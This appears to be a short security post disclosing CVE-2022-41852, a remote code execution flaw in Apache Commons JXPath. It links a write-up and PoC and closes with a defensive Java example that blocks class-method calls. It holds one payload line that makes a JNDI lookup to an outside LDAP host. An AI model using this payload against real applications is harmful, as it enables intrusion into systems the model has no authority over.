
Remote Apache Commons JXPath Library RCE (CVE-2022-41852)

tokyoghoul

Those using JXPath to interpret untrusted XPath expressions may be vulnerable to a remote code execution attack. All JXPathContext class functions processing an XPath string are vulnerable except the compile() and compilePath() functions. The XPath expression can be used by an attacker to load any Java class from the classpath, resulting in code execution.

Read more here:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC:
https://github.com/Warxim/CVE-2022-41852
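
Added example, not part of the original post or of the JXPath project: one way to evaluate untrusted expressions with class-method resolution switched off, by giving the context an empty `FunctionLibrary` so it does not fall back to JXPath's generic functions. The class `HardenedJXPath`, its two helper methods and the sample map are hypothetical names made up for this illustration.

```java
import org.apache.commons.jxpath.FunctionLibrary;
import org.apache.commons.jxpath.JXPathContext;
import org.apache.commons.jxpath.JXPathException;

import java.util.HashMap;
import java.util.Map;

public class HardenedJXPath {

    // Build a context whose extension-function table is an empty FunctionLibrary.
    // Without this, a root context falls back to JXPath's generic functions,
    // which resolve "package.Class.method(...)" to classes on the classpath.
    static JXPathContext newHardenedContext(Object root) {
        JXPathContext ctx = JXPathContext.newContext(root);
        ctx.setFunctions(new FunctionLibrary());
        return ctx;
    }

    // Evaluate an untrusted expression; return null if it is rejected.
    static Object evaluateUntrusted(Object root, String xpath) {
        try {
            return newHardenedContext(root).getValue(xpath);
        } catch (JXPathException e) {
            // Extension-function calls end up here (function not found),
            // as do malformed expressions and missing paths.
            System.err.println("rejected: " + xpath + " (" + e.getMessage() + ")");
            return null;
        }
    }

    public static void main(String[] args) {
        Map<String, Object> root = new HashMap<>(); // constructed sample data
        root.put("name", "alice");

        // Plain property access and core XPath functions still work.
        System.out.println(evaluateUntrusted(root, "name"));
        System.out.println(evaluateUntrusted(root, "string-length(name)"));

        // A class-method call with a harmless target, the same expression
        // shape as the payload above, is refused by the hardened context.
        System.out.println(evaluateUntrusted(root, "java.lang.Integer.parseInt('7')"));
    }
}
```

If an application needs specific extension functions, register only those in the `FunctionLibrary` instead of leaving it empty.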
 

